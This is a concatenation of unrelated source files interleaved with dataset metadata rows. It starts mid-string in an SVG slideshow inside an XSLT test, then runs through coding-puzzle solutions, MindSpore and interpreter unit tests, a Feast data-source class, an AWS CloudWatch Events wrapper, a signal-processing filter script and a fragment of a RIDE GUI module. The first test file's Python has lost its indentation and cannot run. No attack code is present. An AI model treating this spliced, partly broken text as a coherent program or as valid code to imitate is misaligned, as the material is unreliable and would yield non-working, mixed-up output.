<text id='slide3-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-1MenuItem')" onclick='onMenuItemSelected(evt, 8)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-1MenuItem')" class='slideMenuItem'>Some SVG Resources</text>
<text id='slide3-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-2MenuItem')" onclick='onMenuItemSelected(evt, 9)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-2MenuItem')" class='slideMenuItem'>Quote Them on it</text>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand2.click' to='0, 60'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse2.click' to='0, -60'/>
</g>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand1.click' to='0, 20'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse1.click' to='0, -20'/>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slideShowCover'>
<defs>
<linearGradient spreadMethod='pad' id='backgroundPaint' x1='0' y2='768' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='25%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='50%' style='stop-color:white; stop-opacity:1;'/>
<stop offset='75%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:black; stop-opacity:1;'/>
</linearGradient>
<filter height='105%' id='dropShadow' filterUnits='objectBoundingBox' x='0%' width='105%' y='0%'>
<feGaussianBlur in='SourceAlpha' result='blur' stdDeviation='4'/>
<feOffset dy='4' dx='4' result='offsetBlur' in='blur'/>
<feFlood style='flood-color:black' result='solidBlack'/>
<feComposite in='solidBlack' in2='SourceAlpha' result='separation' operator='in'/>
<feOffset dy='-1' dx='-1' result='offsetSeparation' in='separation'/>
<feMerge>
<feMergeNode in='offsetBlur'/>
<feMergeNode in='offsetSeparation'/>
<feMergeNode in='SourceGraphic'/>
</feMerge>
</filter>
</defs>
<rect height='768' style='fill:url(#backgroundPaint)' width='1024'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<g style='filter:url(#dropShadow)'>
<text class='slideCoverTitle' style='text-anchor:middle' x='512' y='300'>Introduction to SVG</text>
<g transform='translate(512, 490)' id='metadata' style='text-anchor:middle;'>
<text x='0' class='slideCoverSubTitle' y='0'>Uche Ogbuji</text>
<text x='0' class='slideCoverSubTitle' y='50'>Principal Consultant</text>
<text x='0' class='slideCoverSubTitle' y='100'>Fourthought Inc.</text>
<text x='0' class='slideCoverSubTitle' y='150'>Front Range XML Keiretsu</text>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover1'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>Background and Motivation</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover2'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The ABCs of SVG</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover3'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The SVG Community</text>
</g>
<g id='slide1-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Why Yet Another Graphics Format?</text>
<g><text x="240" y="150" class="itemClass">Leveraging the existing XML technology base</text></g>
<g><text x="240" y="185" class="itemClass">Integrating graphics into the semantic Web</text></g>
<g><text x="240" y="220" class="itemClass">Giving browsers access to image <tspan class='emphasis'>internals</tspan></text></g>
<g><text x="240" y="255" class="itemClass">Supporting the next generation of browsers</text></g>
</g>
<g id='slide2-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Features</text>
<text x='240' class='headingInline' y='150'>Basic Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='185'/>
<g><text x="270" y="185" class="itemClass">Coordinate spaces and transforms</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='220'/>
<g><text x="270" y="220" class="itemClass">Graphics primitives: ellipses, polygons, polylines, curves, etc.</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='255'/>
<g><text x="270" y="255" class="itemClass">Stylesheets: CSS, XSL, etc.</text></g>
<text x='240' class='headingInline' y='290'>Advanced Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='325'/>
<g><text x="270" y="325" class="itemClass">Raster filter effects</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='360'/>
<g><text x="270" y="360" class="itemClass">Alpha masking</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='395'/>
<g><text x="270" y="395" class="itemClass">Animation</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='430'/>
<g><text x="270" y="430" class="itemClass">Zooming and Panning</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='465'/>
<g><text x="270" y="465" class="itemClass">Scripting and extensibility</text></g>
</g>
<g id='slide2-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Source</text>
<text x='240' class='preformattedInline' y='135'>
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20000802//EN"
"http://www.w3.org/TR/2000/CR-SVG-20000802/DTD/svg-20000802.dtd"
>
<svg width="800" height="800">
<desc>SVG Sample for SunWorld Article</desc>
<style type="text/css">
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: black; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica }
</style>
<ellipse transform="translate(500 200)" rx="250" ry="100"
style="fill: brown; stroke: yellow; stroke-width: 10"/>
<polygon transform="translate(100 200) rotate(45)"
class="Lagos"
points="350,75 379,161 469,161 397,215 423,301 350,250 277,
301 303,215 231,161 321,161"/>
<text class="OrthoLogos" x="400" y="400">TO KALON</text>
<path class="ViaAppia" d="M500,600 C500,500 650,500 650,600
S800,700 800,600"/>
</svg>
</text>
</g>
<g id='slide2-3' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Output</text>
<g transform='translate(240, 135)'>
<svg height='10cm' width='10cm' viewBox='0 0 200 200'>
<desc>SVG Sample for SunWorld Article</desc>
<style type='text/css'>
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: white; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica; fill:white }
</style>
<ellipse transform='translate(500 200)' ry='100' rx='250' style='fill: brown; stroke: yellow; stroke-width: 10'/>
<polygon points='350,75 379,161 469,161 397,215 423,301 350,250 277, 301 303,215 231,161 321,161' transform='translate(100 200) rotate(45)' class='Lagos'/>
<text class='OrthoLogos' x='400' y='400'>TO KALON</text>
<path class='ViaAppia' d='M500,600 C500,500 650,500 650,600 S800,700 800,600'/>
</svg>
</g>
</g>
<g id='slide3-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Some SVG Resources</text>
<g><text x="240" y="150" class="itemClass"><tspan class='linkStyle'>The W3C's SVG Page</tspan></text></g>
<g><text x="240" y="185" class="itemClass"><tspan class='linkStyle'>OpenDirectory SVG Links</tspan></text></g>
<g><text x="240" y="220" class="itemClass"><tspan class='linkStyle'>How to make slides like these</tspan></text></g>
</g>
<g id='slide3-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Quote Them on it</text>
<text x='240' class='paraInline' y='150'>"Over twenty organizations, including Sun Microsystems, Adobe, Apple, IBM, and Kodak, have been involved in defining SVG."<tspan class='emphasis'> -- Vincent J. Hardy, Sun</tspan>
</text>
<text x='240' class='paraInline' y='185'>"I have been working with computer graphics for
over 25 years and split an immense amount of blood on the floor at
midnight. With SVG I can now do almost anything I want [except for 3D - in
which I also have a molecular interest]. And I suspect that I can stick
with it for the foreseeable future." <tspan class='emphasis'>-- Peter Murray-Rust, XML-DEV Founder</tspan>
</text>
<text x='240' class='paraInline' y='220'>"I envision a day where we have XHTML Web pages with SVG as the "chrome" of our interfaces--defining the buttons, the layers, the coloring, and the grid--where we can actually use a language that's XML-based rather than theses separate GIF files that can take so long to download. That's certainly one vision; that vision not just extending on the Web, on a monitor, but wireless onto my Palm Pilot or to print and other output as well." <tspan class='emphasis'>-- Steve Mulder, Razorfish</tspan>
</text>
</g>
</svg>"""
#"'
expected_1="""
<svg/>"""
def Test(tester):
tester.startTest("Checking for SVG stylesheets")
try:
import urllib
for uri in (sheet_1_uri, sheet_2_uri, sheet_3_uri):
fd = urllib.urlopen(uri)
fd.close()
tester.testDone()
except (IOError, OSError):
tester.warning(
"You must have 'svgslides.xsl', 'svgslides_custom.xsl' and\n"
"'slidescript.xsl' from Sun's SVG toolkit to run this test.\n"
"See http://www.sun.com/software/xml/developers/svg-slidetoolkit/\n"
"or ftp://ftp.fourthought.com/pub/third-party/test-material/\n"
"It's enough to copy *.xsl from that package to the\n"
"'%s' directory." % os.path.dirname(__file__))
tester.testDone()
else:
source = test_harness.FileInfo(uri=source_1_uri)
sheet = test_harness.FileInfo(uri=sheet_1_uri)
test_harness.XsltTest(tester, source, [sheet], expected_1)
return
| 51.010234
| 541
| 0.567367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34,129
| 0.978161
|
42646da758d7d00689423c6bb8d4edd633b50938
| 232
|
py
|
Python
|
src/2/2338.py
|
youngdaLee/Baekjoon
|
7d858d557dbbde6603fe4e8af2891c2b0e1940c0
|
[
"MIT"
] | 11
|
2020-09-20T15:17:11.000Z
|
2022-03-17T12:43:33.000Z
|
src/2/2338.py
|
youngdaLee/Baekjoon
|
7d858d557dbbde6603fe4e8af2891c2b0e1940c0
|
[
"MIT"
] | 3
|
2021-10-30T07:51:36.000Z
|
2022-03-09T05:19:23.000Z
|
src/2/2338.py
|
youngdaLee/Baekjoon
|
7d858d557dbbde6603fe4e8af2891c2b0e1940c0
|
[
"MIT"
] | 13
|
2021-01-21T03:19:08.000Z
|
2022-03-28T10:44:58.000Z
|
"""
2338. 긴자리 계산
작성자: xCrypt0r
언어: Python 3
사용 메모리: 29,380 KB
소요 시간: 72 ms
해결 날짜: 2020년 9월 13일
"""
def main():
A, B = int(input()), int(input())
print(A + B, A - B, A * B, sep='\n')
if __name__ == '__main__':
main()
| 12.888889
| 40
| 0.538793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 165
| 0.580986
|
4264be58cf46729f9ccb094d1db453583943d301
| 2,952
|
py
|
Python
|
tests/ut/python/nn/test_activation.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/ut/python/nn/test_activation.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/ut/python/nn/test_activation.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test Activations """
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.common.api import _cell_graph_executor
from ..ut_filter import non_graph_engine
class SoftmaxNet(nn.Cell):
def __init__(self, dim):
super(SoftmaxNet, self).__init__()
self.softmax = nn.Softmax(dim)
def construct(self, x):
return self.softmax(x)
@non_graph_engine
def test_compile():
net = SoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
@non_graph_engine
def test_compile_axis():
net = SoftmaxNet(-1)
prob = 355
input_data = np.random.randn(4, 16, 1, 1).astype(np.float32) * prob
input_tensor = Tensor(input_data)
net(input_tensor)
class LogSoftmaxNet(nn.Cell):
def __init__(self, dim):
super(LogSoftmaxNet, self).__init__()
self.logsoftmax = nn.LogSoftmax(dim)
def construct(self, x):
return self.logsoftmax(x)
@non_graph_engine
def test_compile_logsoftmax():
net = LogSoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
class Net1(nn.Cell):
def __init__(self):
super(Net1, self).__init__()
self.relu = nn.ReLU()
def construct(self, x):
return self.relu(x)
def test_compile_relu():
net = Net1()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class Net_gelu(nn.Cell):
def __init__(self):
super(Net_gelu, self).__init__()
self.gelu = nn.GELU()
def construct(self, x):
return self.gelu(x)
def test_compile_gelu():
net = Net_gelu()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class NetLeakyReLU(nn.Cell):
def __init__(self, alpha):
super(NetLeakyReLU, self).__init__()
self.leaky_relu = nn.LeakyReLU(alpha)
def construct(self, x):
return self.leaky_relu(x)
def test_compile_leaky_relu():
net = NetLeakyReLU(alpha=0.1)
input_data = Tensor(np.array([[1.6, 0, 0.6], [6, 0, -6]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
| 27.333333
| 80
| 0.661247
| 966
| 0.327236
| 0
| 0
| 554
| 0.187669
| 0
| 0
| 677
| 0.229336
|
42667a983dfb48f00077636f4ff9f6c3c1fe62f9
| 743
|
py
|
Python
|
sdk/python/tests/integration/feature_repos/universal/data_source_creator.py
|
marsishandsome/feast
|
998e16945da240bfa73570cdb2c5e3639f892d34
|
[
"Apache-2.0"
] | 1
|
2021-09-16T16:17:58.000Z
|
2021-09-16T16:17:58.000Z
|
sdk/python/tests/integration/feature_repos/universal/data_source_creator.py
|
marsishandsome/feast
|
998e16945da240bfa73570cdb2c5e3639f892d34
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/tests/integration/feature_repos/universal/data_source_creator.py
|
marsishandsome/feast
|
998e16945da240bfa73570cdb2c5e3639f892d34
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import Dict
import pandas as pd
from feast.data_source import DataSource
from feast.repo_config import FeastConfigBaseModel
class DataSourceCreator(ABC):
@abstractmethod
def create_data_source(
self,
destination: str,
df: pd.DataFrame,
event_timestamp_column="ts",
created_timestamp_column="created_ts",
field_mapping: Dict[str, str] = None,
) -> DataSource:
...
@abstractmethod
def create_offline_store_config(self) -> FeastConfigBaseModel:
...
@abstractmethod
def teardown(self):
...
@abstractmethod
def get_prefixed_table_name(self, name: str, suffix: str) -> str:
...
| 22.515152
| 69
| 0.664872
| 566
| 0.761777
| 0
| 0
| 514
| 0.69179
| 0
| 0
| 16
| 0.021534
|
42683ff20338aa58755c4a687ba9b5618ac5ee33
| 1,393
|
py
|
Python
|
tests/interpreter/expression/var_assignment_interpreter_test.py
|
OtavioHenrique/yalul
|
ce99e32365ed5607527b9f2f39705ad5d9e20ba2
|
[
"MIT"
] | 1
|
2021-04-01T20:22:36.000Z
|
2021-04-01T20:22:36.000Z
|
tests/interpreter/expression/var_assignment_interpreter_test.py
|
OtavioHenrique/yalul
|
ce99e32365ed5607527b9f2f39705ad5d9e20ba2
|
[
"MIT"
] | 1
|
2020-11-20T22:24:38.000Z
|
2020-11-20T22:24:38.000Z
|
tests/interpreter/expression/var_assignment_interpreter_test.py
|
OtavioHenrique/yalul
|
ce99e32365ed5607527b9f2f39705ad5d9e20ba2
|
[
"MIT"
] | null | null | null |
from yalul.interpreters.environment import Environment
from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter
from yalul.interpreters.interpreter_errors import InterpreterErrors
class TestVarAssignmentInterpreter:
"""Test var assignment expression interpreter"""
def test_interpreting_var_assignment_without_errors(self):
"""
Validates if VarAssignmentInterpreter is interpreting correctly
"""
error = InterpreterErrors()
env = Environment({}, {})
env.add_variable('Name', 'Gabriela')
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response == 'Otavio'
assert env.get_variable('Name') == 'Otavio'
assert error.errors == []
def test_interpreting_var_assignment_errors(self):
"""
Validates if VarAssignmentInterpreter is generating errors when variable don't exists
"""
error = InterpreterErrors()
env = Environment({}, {})
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response is None
assert error.errors == ['Interpreter Error: Can\'t assign value Otavio to variable named "Name" because it '
'doesn\'t exists']
| 34.825
| 116
| 0.676238
| 1,172
| 0.84135
| 0
| 0
| 0
| 0
| 0
| 0
| 411
| 0.295047
|
4268f94ca522ab0b564db536a3198008325ec23d
| 2,547
|
py
|
Python
|
backend/externals/events.py
|
crosspower/naruko
|
4c524e2ef955610a711830bc86d730ffe4fc2bd8
|
[
"MIT"
] | 17
|
2019-01-23T04:37:43.000Z
|
2019-10-15T01:42:31.000Z
|
backend/externals/events.py
|
snickerjp/naruko
|
4c524e2ef955610a711830bc86d730ffe4fc2bd8
|
[
"MIT"
] | 1
|
2019-01-23T08:04:44.000Z
|
2019-01-23T08:44:33.000Z
|
backend/externals/events.py
|
snickerjp/naruko
|
4c524e2ef955610a711830bc86d730ffe4fc2bd8
|
[
"MIT"
] | 6
|
2019-01-23T09:10:59.000Z
|
2020-12-02T04:15:41.000Z
|
import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
def __init__(self):
self.client = boto3.client('events', region_name=settings.NARUKO_REGION)
def list_rules(self):
response = []
for rules in self._list_rules():
response.extend(rules)
return response
def _list_rules(self):
# 最初はTokenなし
response = self.client.list_rules(NamePrefix='NARUKO-')
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
# Tokenがあれば次ページを返す
while token:
response = self.client.list_rules(
NamePrefix='NARUKO-',
NextToken=token
)
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
@staticmethod
def _build_cloudwatchevent(rules: dict):
cloudwatchevents = []
for rule in rules:
cloudwatchevents.append(CloudWatchEvent(
name=rule["Name"],
schedule_expression=rule.get("ScheduleExpression"),
is_active=rule["State"] == "ENABLED"
))
return cloudwatchevents
def save_event(self, event):
# ルール作成
self.client.put_rule(
Name=event.cloudwatchevent.name,
ScheduleExpression=event.cloudwatchevent.schedule_expression,
State="ENABLED" if event.cloudwatchevent.is_active else "DISABLED"
)
# ターゲット作成
target = dict(
Id=event.cloudwatchevent.name,
Arn=settings.EVENT_SNS_TOPIC_ARN,
Input=json.dumps(dict(id=event.event_model.id))
)
self.client.put_targets(
Rule=event.cloudwatchevent.name,
Targets=[target]
)
return event
def delete_event(self, event_name):
# ターゲット削除
self.client.remove_targets(
Rule=event_name,
Ids=[event_name]
)
# ルール削除
self.client.delete_rule(
Name=event_name
)
def describe_event(self, event_name):
response = self.client.describe_rule(
Name=event_name
)
return CloudWatchEvent(
name=response["Name"],
schedule_expression=response["ScheduleExpression"],
is_active=response["State"] == "ENABLED"
)
| 28.617978
| 81
| 0.568512
| 2,516
| 0.957746
| 546
| 0.207842
| 380
| 0.144652
| 0
| 0
| 313
| 0.119147
|
4269db32f55f118da9ba1a4ffe9262967fe30e06
| 283
|
py
|
Python
|
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py
|
jiadaizhao/LeetCode
|
4ddea0a532fe7c5d053ffbd6870174ec99fc2d60
|
[
"MIT"
] | 49
|
2018-05-05T02:53:10.000Z
|
2022-03-30T12:08:09.000Z
|
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py
|
ptx-c/LeetCode
|
4ddea0a532fe7c5d053ffbd6870174ec99fc2d60
|
[
"MIT"
] | 11
|
2017-12-15T22:31:44.000Z
|
2020-10-02T12:42:49.000Z
|
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py
|
ptx-c/LeetCode
|
4ddea0a532fe7c5d053ffbd6870174ec99fc2d60
|
[
"MIT"
] | 28
|
2017-12-05T10:56:51.000Z
|
2022-01-26T18:18:27.000Z
|
class Solution:
def mostVisited(self, n: int, rounds: List[int]) -> List[int]:
start, end = rounds[0], rounds[-1]
if end >= start:
return list(range(start, end + 1))
else:
return list(range(1, end + 1)) + list(range(start, n + 1))
| 35.375
| 70
| 0.533569
| 282
| 0.996466
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
426a3bed4febe19951912ab6a1ea3a6374609094
| 356
|
py
|
Python
|
eg/deparse/example.py
|
KennethBlaney/rivescript-python
|
87db472847ab526060afd9a5b8548e9689501a85
|
[
"MIT"
] | null | null | null |
eg/deparse/example.py
|
KennethBlaney/rivescript-python
|
87db472847ab526060afd9a5b8548e9689501a85
|
[
"MIT"
] | null | null | null |
eg/deparse/example.py
|
KennethBlaney/rivescript-python
|
87db472847ab526060afd9a5b8548e9689501a85
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Manipulate sys.path to be able to import converscript from this local git
# repository.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from converscript import RiveScript
import json
bot = RiveScript()
bot.load_file("example.rive")
dep = bot.deparse()
print(json.dumps(dep, indent=2))
| 20.941176
| 75
| 0.735955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 131
| 0.367978
|
426a6f57e84f4626e97b52d506e5d77552f5cfca
| 2,715
|
py
|
Python
|
figuras/PycharmKayStatisticalReport/example_8_11.py
|
bor9/estudiando_el_kay
|
6e07908b8b0b5a5166dadce30001e6100e8304c3
|
[
"MIT"
] | null | null | null |
figuras/PycharmKayStatisticalReport/example_8_11.py
|
bor9/estudiando_el_kay
|
6e07908b8b0b5a5166dadce30001e6100e8304c3
|
[
"MIT"
] | null | null | null |
figuras/PycharmKayStatisticalReport/example_8_11.py
|
bor9/estudiando_el_kay
|
6e07908b8b0b5a5166dadce30001e6100e8304c3
|
[
"MIT"
] | 1
|
2021-11-02T05:27:27.000Z
|
2021-11-02T05:27:27.000Z
|
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal, linalg
from matplotlib import rc
from matplotlib import rcParams
__author__ = 'ernesto'
# if use latex or mathtext
rc('text', usetex=True)
rcParams['text.latex.preamble'] = [r"\usepackage{amsmath}"]
#respuesta al impulso deseada: sinc
N = 50 # numero par
fc = 0.1
nf = 1024
n = np.arange(-N/2, N/2+1)
N += 1
f = np.arange(nf)/(2 * nf)
# parámetros del filtro a diseñar
p = 10
q = 10
# respuesta al impulso
hd = 2 * fc * np.sinc(2 * fc * n) # * np.hanning(N)
# respuesta en frecuencia
_, Hd = signal.freqz(hd, a=1, worN=nf, whole=False, plot=None)
# estimación de los coeficientes del denominador (a)
# hd = np.arange(N)
x = hd[q + 1:]
H = linalg.toeplitz(hd[q: N - 1], hd[q: q - p: -1])
# a_est = np.linalg.solve(H.T @ H, -H.T @ x)
epsilon = 1e-16
#epsilon = 0
a_est = linalg.solve(H.T @ H + epsilon * np.eye(p), -H.T @ x)
print("Número de Condición 1: {}".format(np.linalg.cond(H.T @ H)))
h = hd[: q + 1]
H0 = linalg.toeplitz(np.concatenate(([0], hd[: q])), np.zeros((p, )))
b_est = h + H0 @ a_est
#print(h)
#print(H0)
# respuesta en frecuencia
a_est = np.concatenate(([1], a_est))
print(a_est)
print(b_est)
_, H_est = signal.freqz(b_est, a_est, worN=nf, whole=False, plot=None)
# respuesta al impulso
delta = np.zeros((N,))
delta[0] = 1
h_est = signal.lfilter(b_est, a_est, delta, axis=- 1, zi=None)
ms = 3
fs = 12
n = np.arange(N)
fig = plt.figure(0, figsize=(9, 5), frameon=False)
ax = plt.subplot2grid((8, 2), (0, 0), rowspan=6, colspan=1)
plt.xlim(0, N-1)
plt.ylim(np.amin(hd)-0.02, np.amax(hd)+0.02)
plt.plot(n, hd, linestyle='-', marker='s', color='k', markersize=ms, lw=1, label='${\\rm deseada}$')
plt.plot(n, h_est, linestyle='-', marker='s', color='r', markersize=ms, lw=1, label='${\\rm estimada}$')
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
ax.set_xticklabels([])
ax.set_ylabel('${\\rm Respuesta\;al\;impulso}$', fontsize=fs)
ax = plt.subplot2grid((8, 2), (6, 0), rowspan=2, colspan=1)
e = hd-h_est
plt.xlim(0, N-1)
plt.ylim(np.amin(e)-0.001, np.amax(e)+0.001)
plt.plot(n, e, linestyle='-', marker='s', color='k', markersize=ms)
ax.set_xlabel(r'$n$', fontsize=fs)
ax.set_ylabel(r'$\epsilon[n]$', fontsize=fs)
ax = plt.subplot2grid((8, 2), (0, 1), rowspan=8, colspan=1)
plt.xlim(0, 0.5)
plt.ylim(-55, 8)
plt.plot(f, 10 * np.log10(np.abs(Hd)), 'k', label='${\\rm deseada}$')
plt.plot(f, 10 * np.log10(np.abs(H_est)), 'r', label='${\\rm estimada}$')
ax.set_xlabel('${\\rm Frecuencia\;normalizada}$', fontsize=fs)
ax.set_ylabel('${\\rm Respuesta\;en\;frecuencia\;(dB)}$', fontsize=fs)
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
plt.savefig('example_8_11.pdf', bbox_inches='tight')
plt.show()
| 29.835165
| 104
| 0.64825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 717
| 0.263603
|
426b013c87350379997d161bc0ecdefe4dd2b27e
| 19,353
|
py
|
Python
|
src/robotide/ui/treenodehandlers.py
|
crylearner/RIDE3X
|
767f45b0c908f18ecc7473208def8dc7489f43b0
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-08-20T14:46:02.000Z
|
2017-08-20T14:46:02.000Z
|
src/robotide/ui/treenodehandlers.py
|
crylearner/RIDE3X
|
767f45b0c908f18ecc7473208def8dc7489f43b0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/robotide/ui/treenodehandlers.py
|
crylearner/RIDE3X
|
767f45b0c908f18ecc7473208def8dc7489f43b0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import wx
from robotide.controller.commands import (
RenameKeywordOccurrences, RemoveMacro, AddKeyword, AddTestCase, RenameTest,
CopyMacroAs, AddVariable, UpdateVariableName, RenameFile,
RenameResourceFile, DeleteFile, SortKeywords, Include, Exclude)
from robotide.controller.settingcontrollers import VariableController
from robotide.controller.macrocontrollers import (
TestCaseController, UserKeywordController)
from robotide.controller.filecontrollers import (
TestDataDirectoryController, ResourceFileController,
TestCaseFileController, ExcludedDirectoryController,
DirtyRobotDataException)
from robotide.editor.editordialogs import (
TestCaseNameDialog, UserKeywordNameDialog, ScalarVariableDialog,
ListVariableDialog, CopyUserKeywordDialog, DictionaryVariableDialog)
from robotide.publish import RideOpenVariableDialog
from robotide.ui.progress import LoadProgressObserver
from robotide.usages.UsageRunner import Usages, ResourceFileUsages
from .filedialogs import (
AddSuiteDialog, AddDirectoryDialog, ChangeFormatDialog, NewResourceDialog,
RobotFilePathDialog)
from robotide.utils import overrides
from robotide.widgets import PopupMenuItems
from .progress import RenameProgressObserver
from .resourcedialogs import ResourceRenameDialog, ResourceDeleteDialog
from robotide.ui.resourcedialogs import FolderDeleteDialog
def action_handler_class(controller):
return {
TestDataDirectoryController: TestDataDirectoryHandler,
ResourceFileController: ResourceFileHandler,
TestCaseFileController: TestCaseFileHandler,
TestCaseController: TestCaseHandler,
UserKeywordController: UserKeywordHandler,
VariableController: VariableHandler,
ExcludedDirectoryController: ExcludedDirectoryHandler
}[controller.__class__]
class _ActionHandler(wx.Window):
is_user_keyword = False
is_test_suite = False
is_variable = False
_label_add_suite = 'New Suite\tCtrl-Shift-F'
_label_add_directory = 'New Directory'
_label_new_test_case = 'New Test Case\tCtrl-Shift-T'
_label_new_user_keyword = 'New User Keyword\tCtrl-Shift-K'
_label_sort_keywords = 'Sort Keywords'
